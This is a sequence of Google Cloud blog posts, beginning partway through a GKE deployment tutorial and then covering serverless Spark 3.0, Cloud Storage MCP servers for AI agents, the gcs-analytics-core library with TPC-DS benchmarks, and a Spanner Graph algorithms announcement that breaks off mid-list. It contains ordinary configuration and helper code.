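
A Google-managed certificate is only provisioned once the domain's DNS record points at the load balancer's IP address, so it is worth confirming the A record before waiting on provisioning. A minimal sketch using the standard library's `socket.gethostbyname_ex`; `dns_points_to` is our own helper name, and a resolver may keep returning cached, stale answers for a while after you change the record.

```python
import socket
from typing import Callable, List, Tuple

# Signature of socket.gethostbyname_ex: hostname -> (canonical_name, aliases, ipv4_addresses)
Resolver = Callable[[str], Tuple[str, List[str], List[str]]]


def dns_points_to(hostname: str, expected_ip: str,
                  resolver: Resolver = socket.gethostbyname_ex) -> bool:
    """Returns True if hostname resolves (IPv4) to expected_ip.

    The resolver is a parameter so the check can be exercised without
    network access.
    """
    try:
        _, _, addresses = resolver(hostname)
    except OSError:  # socket.gaierror (e.g. unknown host) subclasses OSError
        return False
    return expected_ip in addresses
```

For example, `dns_points_to("api.yourdomain.com", os.environ["AGENT_IP"])`, with your own domain substituted.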

Create a gateway.yaml with the following content:

# Gateway: HTTPS load balancer with the managed certificate and static IP
apiVersion: gateway.networking.k8s.io/v1
kind: Gateway
metadata:
  name: adk-gateway
spec:
  gatewayClassName: gke-l7-global-external-managed
  listeners:
  - name: https
    protocol: HTTPS
    port: 443
    tls:
      mode: Terminate
      options:
        networking.gke.io/pre-shared-certs: adk-cert
  addresses:
  - type: NamedAddress
    value: adk-agent-ip
---
# HTTPRoute: forward traffic to the ADK service
apiVersion: gateway.networking.k8s.io/v1
kind: HTTPRoute
metadata:
  name: adk-route
spec:
  parentRefs:
  - name: adk-gateway
  hostnames:
  - "api.yourdomain.com"
  rules:
  - backendRefs:
    - name: adk-service
      port: 80
---
apiVersion: networking.gke.io/v1
kind: HealthCheckPolicy
metadata:
  name: adk-health
  namespace: default
spec:
  default:
    checkIntervalSec: 15
    timeoutSec: 5
    healthyThreshold: 1
    unhealthyThreshold: 2
    logConfig:
      enabled: false
    config:
      type: HTTP
      httpHealthCheck:
        port: 8080
        requestPath: /health
  targetRef:
    group: ""
    kind: Service
    name: adk-service

Apply the configuration:

```
kubectl apply -f gateway.yaml
```

Certificate provisioning can take up to 20 minutes. Monitor the status with:

```
gcloud compute ssl-certificates describe adk-cert --global
```
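
For a Google-managed certificate, the fields that matter in the describe output are `managed.status` and the per-domain `managed.domainStatus` map. Rather than re-running the command by hand, a minimal polling sketch, assuming gcloud is on your PATH; `cert_status` and `wait_until_active` are our own helper names, and the 30-second interval times 40 attempts simply mirrors the 20-minute estimate above.

```python
import json
import subprocess
import time
from typing import Dict, Tuple


def cert_status(describe_json: str) -> Tuple[str, Dict[str, str]]:
    """Extracts (overall status, per-domain status) from describe --format=json output."""
    managed = json.loads(describe_json).get("managed", {})
    return managed.get("status", "UNKNOWN"), managed.get("domainStatus", {})


def wait_until_active(name: str = "adk-cert", interval_s: int = 30, attempts: int = 40) -> bool:
    """Polls the certificate until it is ACTIVE; returns False if attempts run out."""
    for _ in range(attempts):
        out = subprocess.run(
            ["gcloud", "compute", "ssl-certificates", "describe", name,
             "--global", "--format=json"],
            check=True, capture_output=True, text=True,
        ).stdout
        status, domains = cert_status(out)
        print(status, domains)
        if status == "ACTIVE":
            return True
        time.sleep(interval_s)
    return False
```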

Once the status shows ACTIVE, your agent is live at https://api.yourdomain.com. You can test it with:

```
# Create a new session
curl -X POST https://api.yourdomain.com/apps/weather_agent/users/u_124/sessions/s_124

# Run a message
curl -s -X POST https://api.yourdomain.com/run \
  -H "Content-Type: application/json" \
  -d '{
    "appName": "weather_agent",
    "userId": "u_124",
    "sessionId": "s_124",
    "newMessage": {
      "role": "user",
      "parts": [{"text": "Hey whats the weather in new york today"}]
    }
  }' | jq .
```

Conclusion & Looking Ahead

By following these steps, you have successfully deployed a production-ready AI agent built with ADK onto GKE Autopilot that invokes Gemini on Vertex AI with Workload Identity for authentication. This setup ensures that your agent can scale horizontally to meet demand while maintaining a high security posture.

As you look ahead, consider integrating more complex tools or leveraging GKE's multi-cluster capabilities for even greater resilience. For more details on the technologies used here, explore the official GKE documentation and the ADK repository.

To avoid ongoing charges, delete the resources you created when you are finished. If you skipped Step 7, omit the Gateway, address, and certificate commands:

```
kubectl delete -f gateway.yaml
kubectl delete -f deployment.yaml
gcloud compute addresses delete adk-agent-ip --global
gcloud compute ssl-certificates delete adk-cert --global
gcloud container clusters delete $CLUSTER_NAME --region $REGION
gcloud artifacts repositories delete adk-repo --location $REGION
gcloud iam service-accounts delete adk-gke-sa@$PROJECT_ID.iam.gserviceaccount.com
```

What’s new in serverless Managed Service for Apache Spark

Wed, 03 Jun 2026 16:00:00 +0000

Whether you use it for data preparation, real-time interactive queries, AI model training, or something entirely different, running Apache Spark at scale is demanding — you shouldn’t have to manage the underlying infrastructure too.

Late last year, we announced the general availability (GA) of our serverless Managed Service for Apache Spark runtime version 3.0, prioritizing speed, simplicity, and reliability. Since then, customer use of Managed Service for Apache Spark for data science has nearly doubled year over year. We see this as a testament to our belief that Google Cloud is the easier, smarter, and faster place to run your Apache Spark workloads.

In this blog, let’s dive into a few key features that make our serverless Apache Spark offering a great fit for a wide range of workflows, including feature engineering, GPU-accelerated model training and tuning, semantic search, RAG, building AI agents and applications, and more.

Zero-setup onboarding

The most significant barrier to entry for a cloud service is often the "time to magic moment" — the interval between creating a project and running your first workload. Previously, with serverless Spark, you still needed to manually configure IAM roles, VPC networking, and firewall rules before submitting a single job.

In the serverless Spark 3.0 runtime version, zero-setup onboarding significantly reduces the time to launch your first workload on serverless Spark. It does so by automating the following steps:

Permissions: Necessary IAM roles and permissions are automatically provisioned to the appropriate service accounts.
Networking: Private Google Access is auto-enabled on subnets, and system firewall policies are configured automatically.
API management: Instead of manually enabling several different APIs, as you did previously, you now only need to enable the Managed Service for Apache Spark API.

Fast startup for SLA-sensitive workloads

Latency matters, especially for interactive data science and SLA-sensitive batch pipelines. Historically, serverless Spark startup could take several minutes. With the 3.0 runtime, we've reduced startup times by 75% across both standard and premium tiers, delivered automatically without any code or configuration changes and at no additional cost.

This massive improvement qualifies serverless Spark for a much broader range of SLA-sensitive workloads, and we’re always looking to optimize startup times even further.

"Serverless Spark allowed us to quickly reap benefits by removing the need for fine-grain machine management. This drove faster model development and significantly reduced our data processing costs." - César Narnajo, Principal Engineer, Moloco

Better GPU obtainability

Support for Dynamic Workload Scheduler (DWS) Flex Start mode in the serverless 3.0 runtime version allows serverless Spark to queue customer requests for a configurable duration when GPUs are unavailable. This addresses obtainability challenges for high-demand accelerators like NVIDIA A100 and L4, which are subject to frequent regional shortages. By holding workloads until the necessary GPU capacity becomes available, DWS can dramatically increase obtainability and reliability for AI/ML workloads that can tolerate a short wait for capacity.

First-class support for Apache Spark 4.x

The serverless Spark 3.0 runtime version supports current and upcoming Apache Spark 4.x innovations, including Spark Connect, which supports a decoupled client-server architecture that enables remote connectivity from any client.

Enhanced multi-zonal support

To protect global enterprise workloads from zonal outages or hardware stockouts, the serverless Spark 3.0 runtime introduces enhanced multi-zonal support by default. The service can now automatically allocate execution nodes across multiple zones within a single region to help ensure obtainability.

Crucially, we do not charge for cross-zonal network traffic between nodes in a region, providing high availability without the traditional multi-zone tax. This is another benefit that you can realize by bringing your global Apache Spark workloads to Google Cloud.

Looking ahead

In addition to the above, we're continuing to push the boundaries of ease of use in areas such as history-based autotuning and goal-based autoscaling.

Get started today

You can take advantage of these features today by specifying runtime_version: 3.0 in your batch workloads or interactive sessions. To run your first workload on serverless Spark, perform the following simple steps:

Enable the Managed Service for Apache Spark API.
If you aren’t the project owner, ask your project admin for the serverless Managed Service for Apache Spark Editor (roles/dataproc.serverlessEditor) role on the project.

Now you’re ready to start running your workloads on the Serverless 3.0 runtime version. For more details, visit our updated documentation and access serverless Managed Service for Apache Spark in the Google Cloud console.
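
If you submit batches from code rather than the console or CLI, the runtime version is the `runtime_config.version` field of the batch in the Dataproc API (the API behind the `gcloud dataproc` commands and `roles/dataproc.serverlessEditor` role mentioned above). A minimal sketch using the `google-cloud-dataproc` Python client; it assumes the library is installed, Application Default Credentials are configured, and a PySpark script exists at the placeholder URI you pass in. `build_batch` and `submit_batch` are our own helper names.

```python
from typing import Any, Dict


def build_batch(main_python_file_uri: str, runtime_version: str = "3.0") -> Dict[str, Any]:
    """Builds a Batch resource (as a dict) for a PySpark job on a given runtime version."""
    return {
        "pyspark_batch": {"main_python_file_uri": main_python_file_uri},
        "runtime_config": {"version": runtime_version},
    }


def submit_batch(project_id: str, region: str, batch_id: str, batch: Dict[str, Any]):
    """Creates the batch and waits for the long-running operation's result."""
    # Imported here so build_batch() works without the client library installed.
    from google.cloud import dataproc_v1

    client = dataproc_v1.BatchControllerClient(
        client_options={"api_endpoint": f"{region}-dataproc.googleapis.com:443"}
    )
    operation = client.create_batch(
        request={
            "parent": f"projects/{project_id}/locations/{region}",
            "batch": batch,
            "batch_id": batch_id,
        }
    )
    return operation.result()
```

For example, `submit_batch("my-project", "us-central1", "first-batch", build_batch("gs://your-bucket/job.py"))`; all four values are placeholders.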

Connecting AI agents with unstructured data using Google Cloud Storage MCP Servers

Tue, 02 Jun 2026 17:00:00 +0000

Google Cloud Storage (GCS) is a foundational component of the modern agentic tech stack and the preferred home for unstructured data at scale. As enterprises deploy agents in production, the critical focus has shifted to turning data into context and building secure, standardized integrations to access context. This is the core of smart storage: making unstructured data inherently agent-ready by turning passive objects into rich context for reasoning. Whether it’s automating complex financial workflows or diagnosing system failures in seconds, AI success now depends on how seamlessly agents can leverage this intelligence to make smart, high-stakes decisions.

In this blog, we will share three examples of agents that customers built using GCS, and then show how you can securely and reliably connect your agents to GCS using the Model Context Protocol (MCP). Combined with smart storage features like auto annotations and object contexts, the GCS MCP server simplifies the whole agent deployment process.

Real-world agent success on Google Cloud Storage

We are seeing incredible innovation from customers leveraging MCP and Google’s agentic tech stack to solve complex business problems:

Palo Alto Networks built the Strata Co-Pilot agent, a screen-aware AI assistant that guides network security administrators through complex configuration flows—either by highlighting steps or executing them directly. The agent is powered by the Gemini Live API, with GCS serving as its “historical memory” connected via the GCS MCP server.
Airwallex developed an AI Assistant that understands user context, answers questions, and executes workflows on their behalf. For example, it can smartly analyze expense policy documents and generate detailed approval workflows - a task that would normally take hours to do manually. GCS and GCS metadata are used by the agent to store documents and the extracted information, respectively.

Snap's Job Optimization Agent analyzes Flink and Spark job specs, metadata, and historical metrics stored on GCS across thousands of jobs to find optimization opportunities, generate cost estimates, and tune configurations. Using this agent, Snap is already seeing investigation time reduced from 30 minutes to 30 seconds!

In all three agents, the GCS MCP server handles data operations and enforces standard RBAC and access policies.

Connecting agents to GCS using MCP

MCP has rapidly emerged as the universal standard for connecting agents to data sources, but building custom servers from scratch is often a slow, distracting process that diverts focus from innovation. This path introduces significant development overhead and risk, as it forces you to manage everything from authentication and error handling to keeping pace with GCS’s evolving capabilities. To solve this, GCS offers two powerful MCP server options — Remote and Local — allowing you to offload the foundational plumbing and focus on creating value.

1. Remote MCP server: Fully-managed
Connecting your agents to the Cloud Storage MCP server requires zero infrastructure deployment. By simply pointing your agent configuration to the managed endpoint, you gain immediate access to your unstructured data on GCS, allowing you to scale your agentic workloads effortlessly without the burden of operational overhead.

Because the Cloud Storage MCP server follows the open MCP standard, it works seamlessly with major agentic frameworks like ADK and is compatible with MCP clients. You can easily connect clients like Google Antigravity and Anthropic’s Claude by adding a Custom Connector in the settings. Simply point it to your Cloud Storage MCP endpoint, and you are ready to start building — no complex configuration files required.
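Behind the Custom Connector UI, an MCP client talks to the server using JSON-RPC 2.0 messages. The minimal Python sketch below only builds the two requests a client typically sends after the `initialize` handshake, which is omitted here.

- `tools/list` discovers the available tools.
- `tools/call` invokes one of them.

The sketch contacts no endpoint and handles no authentication; the remote server relies on IAM for that. The tool name `list_objects` and its `bucket` argument are hypothetical placeholders, not the GCS MCP server's documented tool schema.

```python
import json
from itertools import count
from typing import Optional

# MCP messages are JSON-RPC 2.0 objects; each request carries a unique id.
_request_ids = count(1)


def mcp_request(method: str, params: Optional[dict] = None) -> str:
    """Serialize one JSON-RPC 2.0 request the way an MCP client sends it."""
    message = {"jsonrpc": "2.0", "id": next(_request_ids), "method": method}
    if params is not None:
        message["params"] = params
    return json.dumps(message)


# Ask the server which tools it exposes (after the initialize handshake).
list_tools = mcp_request("tools/list")

# Call one tool. "list_objects" and "bucket" are HYPOTHETICAL placeholders;
# use the tool names and input schemas that tools/list actually returns.
call_tool = mcp_request(
    "tools/call",
    {"name": "list_objects", "arguments": {"bucket": "my-example-bucket"}},
)

print(list_tools)
print(call_tool)
```

In practice, read the tool names and argument schemas from the server's `tools/list` response rather than hard-coding them.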

Connecting an agent to storage requires robust security and governance. The GCS MCP server is built on Google Cloud's standard identity, observability, and security frameworks:

Identity-first security: Authentication is handled entirely through Identity and Access Management (IAM) rather than shared keys. This ensures agents can only access data (buckets and objects) explicitly authorized by the user.
Full observability: To track agent activity, every request and action taken via these MCP servers is logged in Cloud Audit Logs. This provides security teams with a record of every interaction, maintaining visibility alongside ease of access.
MCP security - content scanning: You can optionally configure the MCP endpoint with Google Cloud Model Armor, Google's content security service. This lets you apply security controls against common MCP attack vectors, and it helps prevent the leakage of sensitive data. Covered attack vectors include:
- direct and indirect prompt injection attacks
- MCP tool poisoning attacks
- malicious URL/SQL injections

The remote Cloud Storage MCP server is a good fit for most production use cases. However, as with any remote server, you cannot fully customize its MCP tools.

2. Local MCP Server: Self-managed for controlled customization
While the Remote server handles standard data access, a Local MCP server is the right choice when you need custom tools specific to your business logic. Suppose your agent needs a specialized data transformation, such as redacting PII or adding context from another internal system, whenever it reads a file from GCS. A Local MCP server lets you define those unique capabilities.
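As an illustration of such a custom capability, here is a minimal Python sketch of a tool body that redacts PII before an object's contents reach the model. The tool and its regex patterns are hypothetical, and real PII detection needs far more than two regexes. `fetch_text` is an injected stand-in for an actual GCS read, so the logic can be exercised without network access. In a Local MCP server, a function like `read_object_redacted` would be registered as a tool.

```python
import re
from typing import Callable

# HYPOTHETICAL patterns for illustration only; production PII detection needs
# a dedicated service or a much more thorough rule set.
_PII_PATTERNS = {
    "EMAIL": re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+"),
    "US_SSN": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
}


def redact_pii(text: str) -> str:
    """Replace each matched PII span with a [REDACTED:<TYPE>] marker."""
    for label, pattern in _PII_PATTERNS.items():
        text = pattern.sub(f"[REDACTED:{label}]", text)
    return text


def read_object_redacted(fetch_text: Callable[[str, str], str], bucket: str, name: str) -> str:
    """Custom-tool body: read an object, then redact it before the model sees it.

    `fetch_text(bucket, name)` stands in for a real GCS read (for example, a
    function wrapping the Cloud Storage client library).
    """
    return redact_pii(fetch_text(bucket, name))


# In-memory stand-in for a bucket, used only for this example.
fake_store = {("invoices", "a.txt"): "Contact jane.doe@example.com, SSN 123-45-6789."}
redacted = read_object_redacted(lambda b, n: fake_store[(b, n)], "invoices", "a.txt")
print(redacted)  # Contact [REDACTED:EMAIL], SSN [REDACTED:US_SSN].
```

Injecting the fetch function keeps the business logic testable and lets the same tool wrap whichever GCS access path your server uses.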

The GCS Local MCP server is an open-source GitHub repository of Google-maintained tools that provides you with a reliable bridge to your data. Here are a few tips to keep in mind while designing custom tools:

Provide precise, clear tool descriptions to minimize incorrect invocations by the model.
Implement model-friendly error handling so the model can understand its mistakes and self-correct.
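Both tips can be sketched in one hypothetical tool, shown here in Python.

- **Clear description:** the docstring states exactly when to use the tool and what shape its argument takes.
- **Recoverable errors:** errors come back as structured text that explains how to recover, rather than as a bare exception.

The tool name `get_object_metadata` and the injected `lookup` function are assumptions for illustration, not part of the GCS Local MCP repository.

```python
import json
from typing import Callable, Dict, Tuple


def get_object_metadata(lookup: Callable[[str, str], dict], bucket: str, name: str) -> str:
    """Return JSON metadata (size, content type) for exactly one object.

    Use this only when you already know the full object name; list the bucket
    first to discover names. `bucket` is a bare bucket name, without "gs://".
    """
    if bucket.startswith("gs://"):
        # Say what was wrong AND how to fix it, so the model can retry correctly.
        bare = bucket[len("gs://"):].split("/")[0]
        return json.dumps({
            "error": "INVALID_ARGUMENT",
            "message": f"'bucket' must be a bare name such as '{bare}', not a gs:// URI.",
        })
    try:
        return json.dumps(lookup(bucket, name))
    except KeyError:
        return json.dumps({
            "error": "NOT_FOUND",
            "message": f"No object '{name}' in bucket '{bucket}'. List the bucket to see valid names.",
        })


# In-memory stand-in for real object metadata, used only for this example.
catalog: Dict[Tuple[str, str], dict] = {
    ("reports", "q1.pdf"): {"size": 2048, "contentType": "application/pdf"},
}
lookup = lambda b, n: catalog[(b, n)]

print(get_object_metadata(lookup, "gs://reports", "q1.pdf"))  # INVALID_ARGUMENT
print(get_object_metadata(lookup, "reports", "q2.pdf"))       # NOT_FOUND
print(get_object_metadata(lookup, "reports", "q1.pdf"))       # the metadata
```

Returning the error as tool output, rather than failing the call, gives the model the hint it needs to correct its arguments on the next attempt.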

The GCS Local MCP server is now also part of MCP Toolbox for Databases. The Toolbox is a single open-source repository containing connectors for major data services such as GCS, BigQuery, AlloyDB, Spanner, and Cloud SQL, which makes it easier to monitor and manage your data ecosystem. It offers:
- simplified development with less boilerplate code
- enhanced security through OAuth2 and OIDC
- end-to-end observability through OpenTelemetry integration

Get started

Whether you are optimizing an existing process like Snap or automating workflow creations like Airwallex, your unstructured data is one of your agent's greatest assets.

Explore the generally available GCS Remote MCP Server.
Check out our GCS Local MCP GitHub repository to start building custom tools today, or use it as part of MCP Toolbox for Databases.
Reach out to us to discuss your Agent use case with GCS data.

Accelerating data lakes: Optimizing Apache Iceberg and Spark with gcs-analytics-core

Tue, 02 Jun 2026 16:00:00 +0000

Many data engineers spend significant time managing compatibility and getting best performance across multiple analytics engines. To help solve this pain point, we are excited to announce gcs-analytics-core, a new open-source Java library designed to centralize and accelerate analytics optimizations for Google Cloud Storage (GCS).

With this library, you get the flexibility to select your preferred analytics engine while achieving high performance on GCS. The gcs-analytics-core library provides optimizations for analytics engines you already use on GCS today, such as Apache Spark with Apache Iceberg. We plan to expand support to other analytics engines by the end of this year.

Built to be shared across major data processing frameworks like Apache Spark, this library consolidates GCS-specific optimizations in one place and improves performance for analytics workloads on GCS. It is available natively in the Apache Iceberg Java runtime starting with version 1.11.0, and it improves read operations for columnar formats like Parquet.

What is the gcs-analytics-core library?

The gcs-analytics-core library is a centralized optimization layer that sits between your analytics engines — such as Apache Spark, Trino, and Apache Hive — and the underlying GCS Java SDK. It intercepts read calls and injects performance enhancements, providing a consistent experience without requiring framework-specific tuning.

For Apache Iceberg users, it integrates into the GCSFileIO implementation, replacing traditional sequential reads with parallelized strategies to minimize latency and maximize throughput.
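The difference between sequential and parallel range reads can be sketched in a few lines of Python. This is a toy model, not gcs-analytics-core's Java implementation. `fetch` is a hypothetical stand-in for one ranged GCS read, and the 50 ms sleep simulates per-request latency. Each request spends most of its time waiting on the network, so overlapping the requests in a thread pool cuts wall-clock time roughly in proportion to how many run at once.

```python
import time
from concurrent.futures import ThreadPoolExecutor
from typing import Callable, List, Tuple

Range = Tuple[int, int]              # (offset, length) inside one object
Fetch = Callable[[int, int], bytes]  # HYPOTHETICAL stand-in for one ranged GCS read


def read_sequential(fetch: Fetch, ranges: List[Range]) -> List[bytes]:
    """Baseline: one blocking ranged request after another."""
    return [fetch(offset, length) for offset, length in ranges]


def read_vectored(fetch: Fetch, ranges: List[Range], max_workers: int = 8) -> List[bytes]:
    """Issue all ranged requests concurrently; results keep the input order."""
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        return list(pool.map(lambda r: fetch(r[0], r[1]), ranges))


# Toy object plus a fetch that simulates a fixed per-request latency.
blob = bytes(range(256)) * 1024  # 256 KiB


def slow_fetch(offset: int, length: int) -> bytes:
    time.sleep(0.05)
    return blob[offset:offset + length]


column_chunks = [(0, 100), (50_000, 4_096), (200_000, 1_000), (250_000, 512)]
for reader in (read_sequential, read_vectored):
    start = time.perf_counter()
    chunks = reader(slow_fetch, column_chunks)
    print(f"{reader.__name__}: {time.perf_counter() - start:.2f}s, {sum(map(len, chunks))} bytes")
```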

Key technical optimizations

The library introduces specific optimizations designed to reduce time spent on I/O and end-to-end execution time:

Vectored I/O (threaded): This feature improves read performance by fetching multiple data ranges in parallel within a single operation, reducing the overhead of GCS calls. Without this feature, the system needs to issue a separate call for each data range, increasing both the number of operations and open file latency for each request.
Smart Parquet prefetching: When reading Parquet data, analytics engines typically start by reading the file's footer, which contains the schema and the locations of specific data ranges within the file. The library automatically prefetches this footer data in a single chunk (typically 50KB–100KB). This avoids the multiple network calls that often occur when engines repeatedly seek backward to fetch metadata.
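To illustrate why one footer prefetch helps, here is a minimal Python sketch of the tail read. It relies on the Parquet file layout, in which a file ends with the serialized footer metadata, a 4-byte little-endian length, and the `PAR1` magic bytes. The sketch assumes a hypothetical `fetch(offset, length)` ranged-read callable and a 64 KiB prefetch window, which falls within the 50KB–100KB range mentioned above. The library's actual window size and logic may differ.

```python
import struct
from typing import Callable

MAGIC = b"PAR1"
Fetch = Callable[[int, int], bytes]  # HYPOTHETICAL ranged read: (offset, length) -> bytes


def read_parquet_footer(fetch: Fetch, file_size: int, prefetch_size: int = 64 * 1024) -> bytes:
    """Return the serialized footer metadata of a Parquet file.

    A Parquet file ends with: <footer metadata><4-byte little-endian length>"PAR1".
    Fetching one generous tail chunk usually captures all three at once.
    """
    if file_size < 12:  # leading magic + length + trailing magic
        raise ValueError("file too small to be Parquet")
    tail_len = min(prefetch_size, file_size)
    tail = fetch(file_size - tail_len, tail_len)  # single request for the tail
    if tail[-4:] != MAGIC:
        raise ValueError("missing trailing PAR1 magic")
    (meta_len,) = struct.unpack("<I", tail[-8:-4])
    if meta_len + 8 <= tail_len:
        return tail[-8 - meta_len:-8]  # common case: no extra round trip
    # Footer larger than the prefetch window: one more targeted read.
    return fetch(file_size - 8 - meta_len, meta_len)


# Fake file: magic, data pages, 100-byte footer, length, magic.
meta = b"M" * 100
fake_file = MAGIC + b"d" * 5_000 + meta + struct.pack("<I", len(meta)) + MAGIC
requests = []


def counting_fetch(offset: int, length: int) -> bytes:
    requests.append((offset, length))
    return fake_file[offset:offset + length]


assert read_parquet_footer(counting_fetch, len(fake_file)) == meta
print(len(requests))  # 1
```

A naive reader, by contrast, would first fetch the last 8 bytes to learn the footer length and then issue a second request for the footer itself.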

Spotlight: Apache Iceberg integration

We delivered the first major integration of this library into Apache Iceberg. With Iceberg 1.11.0 or later, analytics engines utilizing Iceberg’s GCSFileIO can leverage these performance enhancements. To adopt the library in your environment, verify your Iceberg catalog is configured to use the native GCS FileIO:

```properties
# Spark configuration example
spark.sql.catalog.my_catalog.io-impl=org.apache.iceberg.gcp.gcs.GCSFileIO
```

Because the core optimizations are embedded within the updated Iceberg runtime and the GCS connector architecture, you automatically benefit from Parquet footer prefetching and multi-threaded vectored reads — with no complex custom tuning required.

You can follow the specific integration details in Apache Iceberg Issue #14326.

Catalog compatibility

The gcs-analytics-core library is compatible with all Iceberg catalogs, including the REST catalog, Hive, and other metadata management systems. Because the performance optimizations are decoupled from the catalog management layer, the library provides consistent read improvements without requiring changes to your existing infrastructure. This lets you scale across diverse data lake architectures.

TPC-DS Performance Benchmarks using Spark

To validate these improvements, end-to-end benchmarking was performed using an open source Apache Spark cluster with an Iceberg catalog configured to use GCSFileIO along with the gcs-analytics-core library.

The benchmark leveraged the industry-standard TPC-DS schema across varying dataset sizes (from 1GB up to 10TB), specifically comparing the new library's optimizations against the default GCSFileIO implementation, which uses sequential vectored reads.

By alleviating the I/O bottleneck at the storage layer, compute engines spend less time waiting for network responses (scan time) and more time processing data (execution time).

Here are the end-to-end TPC-DS benchmark results showcasing the percentage improvement when enabling gcs-analytics-core:

TPC-DS schema size	Scan time improvement	Execution time improvement
1 GB	71.51%	32.61%
10 GB	48.48%	18.94%
100 GB	40.98%	10.95%
1 TB	35.86%	3.38%
10 TB	18.40%	1.58%

As the data shows, gcs-analytics-core improved both scan time and execution time at every dataset size, with the largest relative gains on smaller datasets. The library is effective for the complex query patterns in TPC-DS, delivering scan time reductions that directly lower overall query execution time.
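One way to read the table is through Amdahl's law. Suppose scans make up a fraction f of end-to-end time and the library cuts scan time by s; then the end-to-end gain is roughly f * s.

Working backward from the published numbers gives a rough estimate of how scan-heavy each run was. The estimate rests on an unverified assumption: that all end-to-end savings come from faster scans. On that basis, scans take about 46% of end-to-end time at 1 GB, falling below 10% at 1 TB and 10 TB.

That pattern is consistent with execution-time gains shrinking as datasets grow. However, the benchmark does not report scan shares directly, so treat this Python sketch as an interpretation, not a measurement.

```python
def pct_improvement(baseline_s: float, optimized_s: float) -> float:
    """Percentage reduction in time relative to the baseline run."""
    return (baseline_s - optimized_s) / baseline_s * 100.0


def implied_scan_share(scan_gain_pct: float, exec_gain_pct: float) -> float:
    """Fraction of end-to-end time spent in scans, ASSUMING every end-to-end
    saving comes from faster scans (Amdahl's law: exec_gain = share * scan_gain)."""
    return exec_gain_pct / scan_gain_pct


# (scan time improvement %, execution time improvement %) from the TPC-DS table.
tpcds = {
    "1 GB": (71.51, 32.61),
    "10 GB": (48.48, 18.94),
    "100 GB": (40.98, 10.95),
    "1 TB": (35.86, 3.38),
    "10 TB": (18.40, 1.58),
}
for size, (scan_gain, exec_gain) in tpcds.items():
    share = implied_scan_share(scan_gain, exec_gain)
    print(f"{size:>6}: scans ~ {share:.0%} of end-to-end time (under the stated assumption)")
```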

Get started

Before running your Spark workloads, confirm that the following requirements and configurations are met:

Use Apache Iceberg Spark runtime 1.11.0+ and the iceberg-gcp-bundle 1.11.0+.
Configure your catalog to use GCSFileIO.
Enable the gcs-analytics-core optimization flag (spark.sql.catalog.$CATALOG_NAME.gcs.analytics-core.enabled=true).
Enable vectorized I/O (spark.sql.iceberg.vectorization.enabled=true) to get the best read performance.

```shell
spark-submit \
  --packages org.apache.iceberg:iceberg-spark-runtime-3.5_2.12:1.11.0,org.apache.iceberg:iceberg-gcp-bundle:1.11.0 \
  --conf spark.sql.catalog.$CATALOG_NAME=org.apache.iceberg.spark.SparkCatalog \
  --conf spark.sql.catalog.$CATALOG_NAME.io-impl=org.apache.iceberg.gcp.gcs.GCSFileIO \
  --conf spark.sql.catalog.$CATALOG_NAME.gcs.analytics-core.enabled=true \
  --conf spark.sql.iceberg.vectorization.enabled=true \
  <your-application-jar-or-script>
```

The gcs-analytics-core library is open source and available for developers to contribute to the project and explore the source code. Our implementation and micro-benchmark configurations are part of the repository and can be referenced for your contributions or validations.

GitHub repository: GoogleCloudPlatform/gcs-analytics-core
Documentation: Review the design document for deep architectural details.

We want to hear about your experience. If you test this on your own datasets, please feel free to open an issue on GitHub or share your results with the community. We look forward to seeing how you utilize these optimizations in your data lakes.

Announcing Spanner Graph algorithms: Google-grade intelligence for connected data

Tue, 02 Jun 2026 16:00:00 +0000

At Google Cloud Next, we announced the preview of graph algorithms with Spanner Graph, bringing Google Research’s state-of-the-art graph mining capabilities natively to your database. These graph intelligence capabilities can help you derive valuable insights from graph data faster, cheaper, and at scale.

Enterprises are increasingly leveraging graph technologies to uncover complex relationships in data for use cases such as fraud detection, social network analysis, entity resolution, and healthcare research. Graph algorithms, such as node centrality and community detection, are the computational methods used to analyze these structures, and work by quantifying the patterns and strength of connections between entities. However, running graph algorithms at scale has historically been challenging and resource-intensive, often requiring complex ETL pipelines to dedicated analytic solutions or risking the transactional performance of the graph database.

We designed Spanner Graph algorithms to tackle demanding enterprise workloads without compromising on the performance of your operational database. This architecture provides several distinct advantages:

Tight integration with GQL: Directly invoke algorithms using ISO Graph Query Language (GQL) to run structural analytics across your data. By sequentially weaving algorithms and standard queries together, Spanner Graph minimizes complex data movement to external engines, simplifying your architecture and accelerating time-to-insight.
Near-zero transactional impact and lower TCO: Algorithm execution happens on dedicated compute resources, so as not to impact live production traffic. Spanner automatically provisions resources and securely routes data via Data Boost without having to create a custom ETL pipeline. Pay only for what you use, avoiding expensive licensing and operational overhead of legacy solutions.
Global insights on billion-edge graphs in minutes: Built for scale and speed, our engine can run algorithms on graphs with tens of billions of edges within minutes. Encoding topologies in a dense format that’s optimized for random access enables high-performance structural analytics on massive datasets.

While Google Research has published several research papers, held workshops, and released open-source projects based on its graph mining tools (e.g., for multi-core clustering), this is the first time that they are widely available to Google Cloud customers. Let’s take a deeper look at graph algorithms, and how you can use them with Spanner Graph.

Algorithms: Deeper insights for connected data

When we first launched Spanner Graph, our goal was to reimagine graph data management with a native graph database experience within Spanner, Google's highly scalable, distributed database. Spanner Graph unifies relational and graph models, allowing developers to query connected data using ISO GQL while also interoperating with Spanner's existing tabular, search, and vector capabilities. This allows you to build intelligent applications without creating complex data pipelines, duplicating data, or increasing security and governance risk.

Building on this foundation, Spanner Graph algorithms help you to extract even deeper insights from your connected data. Graph algorithms analyze the relationships and connections within data, revealing hidden patterns and insights that might be missed with traditional analytical methods. With this launch, you can analyze connectedness to, for example, detect fraud rings, conduct clustering for entity resolution, identify points of failure in complex networks, or recommend products based on the preferences of connected users.

We use graphs extensively at Google. In fact, many popular algorithms like PageRank, the foundational technology that powers Google Search, were invented here. With native algorithm support in Spanner Graph, we are bringing some of Google’s leading graph intelligence capabilities directly to Google Cloud customers, with a set of essential graph algorithms that help you easily uncover the hidden structures within your data:

Centrality: Pinpoint the most influential and central nodes within your network using betweenness centrality, closeness centrality, and PageRank.
Community detection: Automatically group highly connected entities to uncover hidden segments with label propagation, correlation clustering, modularity clustering, weakly connected components, and clique aggregator.
Similarity and path finding: Find optimal routes using set-to-set shortest paths, or measure node similarities using Jaccard, cosine, common neighbors, and total neighbors.
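The four neighbor-based similarity measures listed above have standard textbook definitions over the sets of neighbors N(a) and N(b):

- **Common neighbors:** |N(a) ∩ N(b)|
- **Total neighbors:** |N(a) ∪ N(b)|
- **Jaccard:** common neighbors divided by total neighbors
- **Cosine:** common neighbors divided by the geometric mean of the two degrees

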